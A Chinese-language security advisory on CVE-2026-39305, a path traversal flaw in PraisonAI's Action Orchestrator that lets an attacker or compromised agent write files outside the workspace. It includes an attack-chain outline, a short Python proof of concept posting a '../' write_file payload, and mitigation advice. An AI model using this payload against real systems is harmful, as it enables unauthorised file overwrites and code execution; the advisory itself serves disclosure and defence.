CVE-2026-39305 CVSS 9.0 严重

CVE-2026-39305 PraisonAI路径遍历漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39305

漏洞类型

路径遍历 (Path Traversal)

CVSS评分

9.0 严重

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PraisonAI

漏洞概述

PraisonAI是一款多智能体团队系统。在1.5.113版本之前，其Action Orchestrator功能存在路径遍历漏洞。该漏洞允许攻击者或受损的代理通过在目标路径中使用相对路径段（如../），突破配置的工作空间目录限制，向任意文件写入数据。攻击者可利用此漏洞覆盖敏感系统文件或植入可执行载荷，对系统完整性和可用性造成严重影响。

技术细节

该漏洞源于PraisonAI中Action Orchestrator功能对文件路径处理不当。在受影响版本中，系统未能有效过滤或规范化用户（或代理）提交的文件路径参数。攻击者可以通过在路径中插入“../”等目录遍历序列，绕过应用程序预设的工作目录限制。由于该漏洞无需用户交互且可能无需权限（取决于本地环境配置），攻击者一旦获得执行机会，即可利用此缺陷向服务器上的任意位置写入数据。具体利用场景包括覆盖系统关键配置文件（如/etc/passwd或SSH配置）、在自启动目录中植入恶意脚本，或替换现有的可执行文件。这种任意文件写入能力可进一步导致权限提升、服务拒绝或远程代码执行，对系统安全构成严重威胁。

攻击链分析

STEP 1

侦察阶段

攻击者识别出目标系统运行的是PraisonAI且版本低于1.5.113。

STEP 2

载荷构造

攻击者构造包含路径遍历字符（../）的恶意请求，目标路径指向系统敏感目录。

STEP 3

漏洞利用

通过Action Orchestrator接口发送恶意请求，绕过工作目录限制。

STEP 4

达成影响

成功写入恶意文件或覆盖系统文件，导致系统完整性受损或获取执行权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable PraisonAI Action Orchestrator endpoint
target_url = "http://localhost:8000/api/action"

# Malicious payload using path traversal to write outside workspace
# Attempting to write a malicious script to a sensitive location
payload = {
    "action": "write_file",
    "path": "../../../../tmp/pwned.txt",  # Using '../' to escape workspace
    "content": "System compromised by CVE-2026-39305"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, json=payload)
    
    if response.status_code == 200:
        print("[+] PoC executed successfully: File written outside workspace.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

PraisonAI < 1.5.113

防御指南

临时缓解措施

建议立即将PraisonAI升级至1.5.113版本以修复此漏洞。若暂时无法升级，应严格限制Action Orchestrator的运行环境权限，避免以root或管理员身份运行服务，并在操作系统层面实施文件系统访问控制列表（ACL），防止应用写入非工作区目录。同时，部署入侵检测系统监控包含“../”序列的异常请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表